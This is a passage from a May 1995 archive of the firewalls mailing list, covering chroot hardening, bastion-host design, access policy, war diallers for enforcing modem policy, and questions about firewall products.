<3631.9504260648@illuminati>, Marcus J. Ranum wrote: > 4) /lockdown is owned by root and is unwriteable There is one time when /lockdown needs to be made writable, alas. When the customer and/or tester says "something just stopped", and the logs say SEGV, and you want that core dump. We make "/lockdown" a seperate partition, and made it just big enough to take two typically sized core dumps :-) +w only on request though. > Therefore, I'm content to assume that an attacker is >going to have a lot of trouble getting privs for that process, >since there's nothing setuid and no devices. Processes that The one thing that I can think that an attacker might want to do, assuming some kind of fingerd-like hole is that they will write code to do a connect(2) call, and forget compromising the entire firewall. > Now, I did not go review the kernel code that implements >setuid() chroot() and so on. That's for the trusted systems guys >and you can see the impact that trusted system style assurance >has on your product schedules. I have examined the code a bit. I hadn't noticed fchroot() existed on SunOS until about a month ago. It says that it only guarantees that it will chroot(2) back to the real root. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAgUBL6kQAhUFVvYhcjNpAQHvhgH+OUtA0SFhFotOkD5Mal2XHY6ZdMqb5ppC g2rTYAShcVs1wDhxX7hAIdpu+ESSCgQ7/UoMwVby3sEcsx41adE5XA== =YV4Y -----END PGP SIGNATURE----- From firewalls-owner Thu May 4 11:29:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04544 for firewalls-outgoing; Thu, 4 May 1995 10:21:46 -0700 Received: from outside.mediavis.com (mediavis.com [204.30.229.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04539 for ; Thu, 4 May 1995 10:21:43 -0700 Received: from MediaVis.com by outside.mediavis.com with smtp (Smail3.1.28.1 #64) id m0s74ab-000U1hC; Thu, 4 May 95 10:21 PDT Received: from mvimail.mediavis.com by MediaVis.com (Media Vision, Inc.) with SMTP (1.37.109.4/16.2) id AA20974; Thu, 4 May 95 10:15:26 -0700 (Send to firstname_lastname@MediaVis.com) Received: by MVIMAIL.MEDIAVIS.COM with Microsoft Mail id <2FA90C66@MVIMAIL.MEDIAVIS.COM>; Thu, 04 May 95 10:18:30 PDT From: Alan Millar To: firewalls-digest Subject: Re: Help with begining options? Date: Wed, 03 May 95 16:41:00 PDT Message-Id: <2FA90C66@MVIMAIL.MEDIAVIS.COM> Encoding: 47 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fred writes: > 1. If you won't get money for it, don't do it. Security is too important. > You need to establish that there is a business requirement for your > company to connect up to the Internet. THen you need to establish what > the risks are. The cost model should show that it is worth spending money > to protect your assets or it will show that you don't need an Internet > connection enough to justify the cost. The middle ground of "scrimping" > does not belong in the equation. I agree completely that security must not be compromised because of money, and that the connection must be driven by a business need and cost justification. By extension, though, there is more than one way to construct a firewall/Internet connection, and there is more than one type of cost to quantify. You may be in a situation where your manpower is "free" or is a lesser factor because it is already budgeted/committed, but cash for capital acquisitions is tight. In this situation, you can still set up a secure firewall with little cash outlay. It will correspondingly take much more of your time and effort, and you still only do it after you evaluate the risks and business requirements. The term "scrimping" has a connotation of piecing something less-than-adequate together. I consider that different from creating a low-cost solution that fulfills all requirements. The difference is in knowing what your requirements and costs are. Don't scrimp. For example, your requirements could call for e-mail and news for internal users, and FTP and Web services to the public. One not-very-sexy but valid solution for this could be UUCP plus an outsourced FTP and Web site. Low cost and quite secure, relatively speaking; it just depends on your real needs. Remember to differentiate between your needs and your wants. Assuming the IP connection approach, you can construct a proxy bastion for little cash using one of the freely-available Intel Unix versions (NetBSD, Linux, etc) plus the TIS toolkit. You can lock this down plenty tight enough to be Satan-proof :-) and still allow your users the free run of the Web. All of this depends on having a plan and list of requirements first. Plan to spend a lot of time doing your homework. - Alan Millar Computer Network/Operations Manager Media Vision, Inc. AMillar@MediaVis.com From firewalls-owner Thu May 4 12:04:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04685 for firewalls-outgoing; Thu, 4 May 1995 10:27:07 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04680 for ; Thu, 4 May 1995 10:27:04 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id MAA07993 for ; Thu, 4 May 1995 12:29:27 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 202860000; 4 May 95 13:27 CDT Received: from sctc.com by sccmailhost.sctc.com id 180110000; 4 May 95 13:27 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id MAA04958; Thu, 4 May 1995 12:27:24 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id MAA08365; Thu, 4 May 1995 12:27:22 -0500 Date: Thu, 4 May 1995 12:27:22 -0500 From: Rick Smith Message-Id: <199505041727.MAA08365@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Access control across a large network - firewall or other system? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul Ferguson said the following about handling an organization with a variety of levels of trust among its users: >If a centralized access control mechanism is needed in a scenario >such as this, centralized network management is the key. You >simply toss effectiveness to the four winds when you allow autonomous >management of the same IP address space. The onus is on corporate >network management to dictate policy. Can corporate network management actually dictate a policy and make it stick? Once upon a time, MIS departments dictated that all computers would be bought through them. Then along came minis and micros. Today, almost anyone can implement a LAN by visiting the local PC mart. If a system is within a department's budget and it visibly contributes to the corporation's success, no policy is going to unplug it. If dialins or Web pages make them seriously more successful, corporate network management won't be able to do a thing, even if it violates policy. Data security is built (or skewered) on three prongs: mission, threats, and countermeasures. The organization of interest has a "mission" like "build widgets" and its information resources are subject to a variety of threats. As you pile on countermeasures you reduce the threats, often at the expense of the organization's primary mission. At some point security countermeasures are too expensive relative to the level of threat or they too seriously degrade the primary mission. In practice, security provides deterrence. >Otherwise, its every man for himself, to coin a phrase. Certainly >access-control, and route propogation, can be controlled rather >effectively from a fringe-point on a large corporate network, in the >right hands. Corporate network policy has to at least identify the separate groups of players within the organization in terms of mission and the threats they need to deal with. While some groups "build widgets" other groups "sell widgets." Those who sell will need different information services than those who build, and have information of different sensitivity. It may be necessary to break the corporation into separate subnets. Typically we see this with the "main office" and the "subsidiaries" or "subcontractors" or "independent agents." On the other hand, if fellow employees are hacking one another, the corporation has problems that no amount of INFOSEC technology is ever going to fix. They need to fix the real problem. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Thu May 4 12:10:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04919 for firewalls-outgoing; Thu, 4 May 1995 10:37:57 -0700 Received: from ren.stanford.edu (Ren.Stanford.EDU [36.47.0.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04914 for ; Thu, 4 May 1995 10:37:55 -0700 Received: from MR.STANFORD.EDU by REN.STANFORD.EDU (PMDF #3651 ) id <01HQ3OTIQWU0000VD1@REN.STANFORD.EDU>; Thu, 4 May 1995 10:36:05 PDT Received: with PMDF-MR; Thu, 4 May 1995 18:36:00 PDT Date: 04 May 1995 10:31:34 -0700 (PDT) From: Connie Sadler Subject: Re: Secure Modem Pools To: firewalls@greatcircle.com Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Posting-date: 04 May 1995 10:35:00 -0700 (PDT) Importance: normal Priority: non-urgent Sensitivity: Company-Confidential UA-content-id: B202ZVTAF4HM4 X-Hop-count: 1 A1-type: MAIL Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Related to the discussion on Security Dynamics, has anyone got experience with CDI's Remote Dial-in Applications? Secure dialup *over* the firewall is a big issue to us right now. CDI claims to be coming out very soon with a system that uses an ordinary pager as a token for authentication. Our physicians like this idea because they already have pagers and don't want to carry a token. Has anybody heard about this who knows how it will work? Thanks. Connie From firewalls-owner Thu May 4 13:07:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06491 for firewalls-outgoing; Thu, 4 May 1995 11:46:42 -0700 Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06486 for ; Thu, 4 May 1995 11:46:39 -0700 Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id LAA04272; Thu, 4 May 1995 11:40:16 -0700 Received: from abulafia.genmagic.com by genmagic.genmagic.com (4.1/SMI-4.1/JBS) id AA06025; Thu, 4 May 95 11:40:16 PDT Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:firewalls@GreatCircle.COM id AA01810; Thu, 4 May 95 11:50:40 -0700 Date: Thu, 4 May 95 11:50:40 -0700 From: jet@abulafia.genmagic.com (J. Eric Townsend) Message-Id: <9505041850.AA01810@abulafia.genmagic.com> To: jcarroll@wellspring.us.dg.com Cc: firewalls@GreatCircle.COM Subject: a different solution to (re: looking for war diallers In-Reply-To: <9505041253.AA15788@wellspring.us.dg.com> References: <9505041253.AA15788@wellspring.us.dg.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "jcarroll" == Jim Carroll writes: jcarroll> Looking for pointers to war diallers for the purpose of enforcing a jcarroll> "no dialin modem" policy. Our PBX-meister made the default "no external DID" for all our analog lines. To get an external DID requires a note from a VP *and* the security dweeb. From firewalls-owner Thu May 4 13:12:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06108 for firewalls-outgoing; Thu, 4 May 1995 11:26:14 -0700 Received: from GOOD.CCCCD.EDU (good.ccccd.edu [192.231.40.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06099 for ; Thu, 4 May 1995 11:26:11 -0700 From: ZSJABBOTT@EXPRESS.CCCCD.EDU Received: from EXPRESS.CCCCD.EDU by EXPRESS.CCCCD.EDU (PMDF V4.2-12 #3064) id <01HQ3UXDWODC91VTP7@EXPRESS.CCCCD.EDU>; Thu, 4 May 1995 13:32:13 CST Date: Thu, 04 May 1995 13:32:13 -0600 (CST) Subject: Message from China To: firewalls@greatcircle.com Message-id: <01HQ3UXDXHB691VTP7@EXPRESS.CCCCD.EDU> X-VMS-To: IN%"firewalls@greatcircle.com" MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is the message from China concerning ZHU Ling's sickness a valid message? I received the message via the firewall's listserv. Jessie M. Abbott-White Collin County Community College ZSJABBOTT@EXPRESS.CCCCD.EDU Computer Services ZSJABBOTT@GOOD.CCCCD.EDU 2200 West University 214-548-6646 McKinney, Tx. 75069-8001 From firewalls-owner Thu May 4 13:16:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06063 for firewalls-outgoing; Thu, 4 May 1995 11:23:45 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA06058; Thu, 4 May 1995 11:23:41 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 4 May 1995 11:24:18 -0800 To: fc@all.net (Dr. Frederick B. Cohen), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Pentagon security professionals Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:42 PM 5/3/95, Dr. Frederick B. Cohen wrote: > Please feel free to flame away. But not on this list. Flames are not welcome here. If anyone wants to toast Dr. Cohen by private email, be his guest per the invitation above, but don't Cc: Firewalls. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Thu May 4 13:55:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08115 for firewalls-outgoing; Thu, 4 May 1995 13:10:33 -0700 Received: from VNET.IBM.COM (vnet.ibm.com [199.171.26.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA08110 for ; Thu, 4 May 1995 13:10:31 -0700 From: tparette@VNET.IBM.COM Message-Id: <199505042010.NAA08110@miles.greatcircle.com> Received: from RALVM17 by VNET.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 3186; Thu, 04 May 95 16:10:45 EDT Date: Thu, 4 May 95 16:09:53 EDT To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uns firewalls From firewalls-owner Thu May 4 13:55:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07799 for firewalls-outgoing; Thu, 4 May 1995 12:58:05 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA07794 for ; Thu, 4 May 1995 12:58:02 -0700 Received: from relay.tis.com by relay1.UU.NET with SMTP id QQyohr16017; Thu, 4 May 1995 15:58:09 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma016039; Thu, 4 May 95 15:56:06 -0400 Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA13423; Thu, 4 May 95 15:56:47 EDT Received: by (4.1/illuminati) id AA04203; Thu, 4 May 95 16:03:55 EDT From: "Marcus J. Ranum" Message-Id: <4203.9505042003@illuminati> Subject: Re: Firewall failure modes (was Re: performance) To: mcr@milkyway.com (Michael Richardson) Date: Thu, 4 May 1995 16:03:54 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199505041733.NAA00603@metis.milkyway.com> from "Michael Richardson" at May 4, 95 01:33:56 pm Organization: Trusted Information Systems, Inc. Glenwood, MD Phone: 301-854-6889 Coredump: Infocalypse Now!!! Content-Type: text Content-Length: 538 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have examined the code a bit. I hadn't noticed fchroot() existed >on SunOS until about a month ago. It says that it only guarantees that >it will chroot(2) back to the real root. fchroot() is nasty and arguably if you have a socket open to someplace in the real root filesystem you could get OUT of a chrooted area. Periodically I have considered cross-wiring the fchroot() entry in the system call table to call panic(), so that if someone does something that actually manages to invoke an fchroot() I'll know about it. :) mjr. From firewalls-owner Thu May 4 14:24:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06236 for firewalls-outgoing; Thu, 4 May 1995 11:32:44 -0700 Received: from gw0.telebase.com (gw0.telebase.com [192.132.57.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06225 for ; Thu, 4 May 1995 11:32:41 -0700 Received: from gw1.telebase.com by gw0.telebase.com id OAA04604 for ; Thu, 4 May 1995 14:37:21 -0400 From: Chuck Murcko Message-Id: <199505041836.OAA15618@telebase.com> Subject: Life, and xinetd To: Firewalls@GreatCircle.COM Date: Thu, 4 May 1995 14:36:46 -0400 (EDT) In-Reply-To: <199505040800.BAA25512@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at May 4, 95 01:00:11 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1328 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fc@all.net (Dr. Frederick B. Cohen) liltingly intones: > > ...edited... > > Please feel free to flame away. > Brent, maybe it's time to start the Firewalls-Flamage mailing list, what with all the testing, source code, Pentagon security, Dan Farmer, and other gratuitous and bandwidth-wasting info flows and NSHOs. I've gotten a lot of extremely useful information from this list; however, not much of that has been happening lately. Maybe it's time for us all to settle back to the issues at hand; namely, firewalls and their design, construction and maintenance. On another note, I have ported xinetd.2.1.4 to BSDI and Linux. It should be possible to build it for FreeBSD and NetBSD also. I won't waste time and bandwidth running the README out to all, as you can find it at ftp.bsdi.edu and sunsite.unc.edu in those sites' incoming directories as xinetd.2.1.4-bsdi.1.tar.gz and xinetd.2.1.4-linux.1.tar.gz, respectively. Suffice it to say that xinetd is a beefed-up inetd with access control, logging, etc. etc., originally written for SunOS 4.x and Ultrix 4.x by Panagiotis Tsirigotis. Thanks for your patience, Brent. chuck Chuck Murcko Telebase Systems, Inc. Wayne PA chuck@telebase.com And now, on a lighter note: I tried to think of some self- and company-promoting advertising to put here, but I couldn't. From firewalls-owner Thu May 4 14:41:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07778 for firewalls-outgoing; Thu, 4 May 1995 12:57:28 -0700 Received: from gmlink2.gmeds.com (gmlink2.gmeds.com [192.85.154.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07773 for ; Thu, 4 May 1995 12:57:21 -0700 Received: from wtc.nec.gmeds.com (necns.wtc.nec.gmeds.com) by gmlink2.gmeds.com with SMTP id AA12251 (InterLock SMTP Gateway 3.0 for ); Thu, 4 May 1995 15:55:46 -0400 Received: from glock.wtc.nmc.gmeds.com by wtc.nec.gmeds.com (4.1/EDS-1.0) id AA17787; Thu, 4 May 95 15:55:25 EDT Received: by glock.wtc.nmc.gmeds.com (5.x/SMI-SVR4) id AA19669; Thu, 4 May 1995 15:51:49 -0400 From: atkinsr@glock.wtc.nec.gmeds.com (Rusty Atkins L.) Message-Id: <9505041951.AA19669@glock.wtc.nmc.gmeds.com> Subject: looking for war diallers (fwd) To: firewalls@greatcircle.com (firewalls) Date: Thu, 4 May 1995 15:51:48 -0400 (EDT) Reply-To: atkinsr@glock.wtc.nmc.gmeds.com X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forwarded message: > > "atkinsr" == Rusty Atkins L. writes: > > atkinsr> Get the "Hacker Chronicles" CD(s), there are dozen of them > atkinsr> there. > > I'll bite, where do I order them? > They are at computer shows all over the place. Tiger software now carries them. I haven't seen the second disk yet. The first disc is the one I have, and it has lots of dialers, numbers for strange BBS's, etc. I think the discs run about $25 a piece. -- ---------------------------------------------------------------------------- * Rusty Atkins This EDS/ATSS * * email: atkinsr@glock.wtc.nmc.gmeds.com space Mfg B, MD-44 * * Phone: (810) 947-0220 intentionally 30300 Mound * * Pager: (810) 316-3392 left Warren, MI. * * Fax: (810) 947-0652 blank 48090 * ---------------------------------------------------------------------------- From firewalls-owner Thu May 4 15:17:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10334 for firewalls-outgoing; Thu, 4 May 1995 14:20:17 -0700 Received: from usasmtp.usagroup.org ([198.70.128.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10329 for ; Thu, 4 May 1995 14:20:12 -0700 Received: from DOMAIN-E-Message_Server by usasmtp.usagroup.org with Novell_GroupWise; Thu, 04 May 1995 16:24:21 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 04 May 1995 16:20:32 -0600 From: David Leonard To: firewalls@greatcircle.com Subject: Firewall-1 Pros and Cons Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking for companies that have selected Firewall-1 as their firewall product. I am interested in why you chosen this product over the other products, such as, Sidewinder, Guantlet, Janus, and Raptor. If you can explain the pros and cons of your decision I would appreciate it. If you are available to discuss your decision I will gladly give you a call. Thank you. david From firewalls-owner Thu May 4 17:09:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26734 for firewalls-outgoing; Thu, 4 May 1995 17:01:41 -0700 Received: from explorer (explorer.ho.BoM.GOV.AU [134.178.8.120]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA26724 for ; Thu, 4 May 1995 17:01:22 -0700 Message-Id: <199505050001.RAA26724@miles.greatcircle.com> Received: from BoM.GOV.AU (localhost) by explorer with ESMTP (1.37.109.15/16.2) id AA111502091; Fri, 5 May 1995 00:01:32 GMT X-Mailer: exmh version 1.6 4/21/95 To: firewalls@greatcircle.com From: richard.jones@BoM.GOV.AU (Richard Jones) Reply-To: richard.jones@BoM.GOV.AU Subject: Ganutlet on IRIX? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 05 May 1995 00:01:31 GMT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have heard a rumour, and would like it clarified. Has Gauntlet been made available in Silicon Graphics workstations? Are there any plans to do so? Thanks, Richard. Richard Jones, Supercomputing Section at the Bureau of Meteorology, Australia. richard.jones@BoM.GOV.AU, MIME accepted. Work phone: +61-3-669-4539 From firewalls-owner Thu May 4 17:39:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24965 for firewalls-outgoing; Thu, 4 May 1995 16:43:36 -0700 Received: from teal.csn.org (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA24940 for ; Thu, 4 May 1995 16:43:28 -0700 Received: by teal.csn.org id AA24098 (5.65c/IDA-1.5 for firewalls@greatcircle.com); Thu, 4 May 1995 17:43:43 -0600 Date: Thu, 4 May 1995 17:43:43 -0600 From: Scott Surguine Message-Id: <199505042343.AA24098@teal.csn.org> To: firewalls@greatcircle.com Subject: FTP Accross firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings Folks, I must confess to be a bit of a newbie here: I am trying to figure out the best method ( conceptually ) for FTP accross a Firewall. I have read both the FAQ, and the explanation in Bellovin/Cheswick and still don't quite follow this piece of the puzzle. Question: what is a good method that DOES NOT entail having to alter source- code???? I believe that to utilize the PASV alternative, you do require the source. What other options are there, and what is your personal preference? Your help/ideas is greatly appreciated, Scott A. Surguine From firewalls-owner Thu May 4 18:07:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26814 for firewalls-outgoing; Thu, 4 May 1995 17:10:35 -0700 Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA26809 for ; Thu, 4 May 1995 17:10:30 -0700 Received: by tserver.dsac.dla.mil (5.65/1.35) id AA29499; Thu, 4 May 95 20:08:59 -0400 From: nto2584@tserver.dsac.dla.mil (Steven Payne) Message-Id: <9505050008.AA29499@tserver.dsac.dla.mil> Subject: kerberized rlogin for bsd/os To: firewalls@greatcircle.com Date: Thu, 4 May 1995 20:08:58 -0400 (EDT) X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 833 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi, I am presently installing/testing a firewall based on the tis fwtk and running on a 486 under bsd/os. My problem is I do not have the kerberized rlogin working properly. We modified the port from 513 to 543 and recompiled rlogin-gw. It isn't quite working yet, so I thought I would pose the question to the net and see if it's already been done. We suspect that the negotiation of rlogin (kerberized client to the rlogind -k server) may be a cause of the problem. Anyone have any ideas, or better yet a completed kerberized rlogin-gw ? Any help would be appriciated. If we have to write the kerberized rlogin-gw sources may be possible to be obtained. Is there any interest or any ideas on this subject? thanks steve payne DLA Systems Design Center Office of Technology Infusion 614-692-9991 home page www.dsac.dla.mil From firewalls-owner Thu May 4 18:18:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27482 for firewalls-outgoing; Thu, 4 May 1995 17:49:25 -0700 Received: from hobbes.ins.com (hobbes.ins.com [199.0.193.44]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA27471 for ; Thu, 4 May 1995 17:49:15 -0700 Received: (from daemon@localhost) by hobbes.ins.com (8.6.12/8.6.12) id RAA00455; Thu, 4 May 1995 17:12:59 -0700 Received: from uni.ins.com (uni.ins.com [199.0.193.10]) by hobbes.ins.com (8.6.12/8.6.12) with ESMTP id RAA00446 for ; Thu, 4 May 1995 17:10:43 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by uni.ins.com (8.6.10/8.6.10) with ESMTP id IAA14478 for ; Wed, 3 May 1995 08:15:24 -0700 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQyodg26714; Wed, 3 May 1995 11:14:35 -0400 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24105 for firewalls-outgoing; Wed, 3 May 1995 05:43:15 -0700 Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA24100 for ; Wed, 3 May 1995 05:43:11 -0700 Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA00503 for Firewalls@greatcircle.com; Wed, 3 May 95 08:43:29 -0400 Message-Id: Date: 3 May 1995 08:41:29 -0500 From: "Heiser Jay" Subject: Proxy vs filtering: Where's the beef? To: Firewalls@greatcircle.com X-Mailer: Mail*Link SMTP/MS 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Every single firewall digest includes the ongoing religious argument about filtering routers vs. proxy servers. Where's the evidence that either is less secure than the other? Around & around we go with "My firewall's better than your firewall!" (set to music, if you're old enough to remember 60's TV commercials ;-) but I don't see any evidence beyond vague theoretical arguments. Which firewalls are breaking right now? What products and technologies are not making it? What is being succesfully hacked right now as we read this? From firewalls-owner Thu May 4 18:39:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA27347 for firewalls-outgoing; Thu, 4 May 1995 17:43:38 -0700 Received: from sgi.sgi.com (SGI.COM [192.48.153.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA27342 for ; Thu, 4 May 1995 17:43:35 -0700 Received: from sgihub.corp.sgi.com by sgi.sgi.com via ESMTP (950405.SGI.8.6.12/910110.SGI) id RAA12143; Thu, 4 May 1995 17:43:59 -0700 Received: from rock.csd.sgi.com by sgihub.corp.sgi.com via ESMTP (950413.SGI.8.6.12/911001.SGI) id RAA11246; Thu, 4 May 1995 17:43:57 -0700 Received: from boytoy.csd.sgi.com by rock.csd.sgi.com via ESMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id RAA09485; Thu, 4 May 1995 17:43:43 -0700 Received: by boytoy.csd.sgi.com (950215.SGI.8.6.10/911001.SGI) id RAA09556; Thu, 4 May 1995 17:43:42 -0700 From: "Michael/Miguel Sanchez" Message-Id: <9505041743.ZM9554@boytoy.csd.sgi.com> Date: Thu, 4 May 1995 17:43:42 -0700 In-Reply-To: richard.jones@BoM.GOV.AU (Richard Jones) "Ganutlet on IRIX?" (May 5, 12:01am) References: <199505050001.RAA26724@miles.greatcircle.com> X-Mailer: Z-Mail-SGI (3.2S.1215 15dec94 MediaMail) To: firewalls@greatcircle.com, richard.jones@BoM.GOV.AU Subject: Re: Ganutlet on IRIX? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On May 5, 12:01am, Richard Jones wrote: > Subject: Ganutlet on IRIX? > > I have heard a rumour, and would like it clarified. Has Gauntlet been made > available in Silicon Graphics workstations? Are there any plans to do so? > > Thanks, > Richard. Hello all, Silicon Graphics announced yesterday to resellers, that SGI is in the process of porting the Gauntlet product to the SGI platform. It should be available later this year. If you are interested in this product please stay in contact with your SGI account representative about this product. TIS will have not have any information in regards to the SGI product whereas your account rep will. Hope this helps. Miguel -- _____________________________________________________________________ Miguel (Michael) J. Sanchez miguel@sgi.com Silicon Graphics Customer Services Engineering "There's always room for jello." Cage #64 _____________________________________________________________________ From firewalls-owner Thu May 4 19:09:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA28809 for firewalls-outgoing; Thu, 4 May 1995 18:59:03 -0700 Received: from earth.execpc.com (earth.execpc.com [204.29.202.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA28803 for ; Thu, 4 May 1995 18:58:59 -0700 Received: from heidegger.execpc.com (heidegger.execpc.com [204.29.203.97]) by earth.execpc.com (8.6.12/8.6.11) with SMTP id UAA02588 for ; Thu, 4 May 1995 20:56:19 -0500 Date: Thu, 4 May 1995 20:56:19 -0500 Message-Id: <199505050156.UAA02588@earth.execpc.com> X-Sender: knitterb@execpc.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: knitterb@sol.net (Brandon Knitter) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uns firewalls BRANDON KNITTER knitterb@sol.net From firewalls-owner Thu May 4 19:26:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28961 for firewalls-outgoing; Thu, 4 May 1995 19:03:49 -0700 Received: from hawksbill.sprintmrn.com (hawksbill.sprintmrn.com [199.11.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA28956 for ; Thu, 4 May 1995 19:03:46 -0700 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA22860; Thu, 4 May 95 22:04:06 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9505050304.AA22860@hawksbill.sprintmrn.com> Subject: Re: Access control across a large network - firewall or other system? To: smith@sctc.com (Rick Smith) Date: Thu, 4 May 1995 22:04:05 -0500 (EST) Cc: firewalls@greatcircle.com, smith@sctc.com In-Reply-To: <199505041727.MAA08365@shade.sctc.com> from "Rick Smith" at May 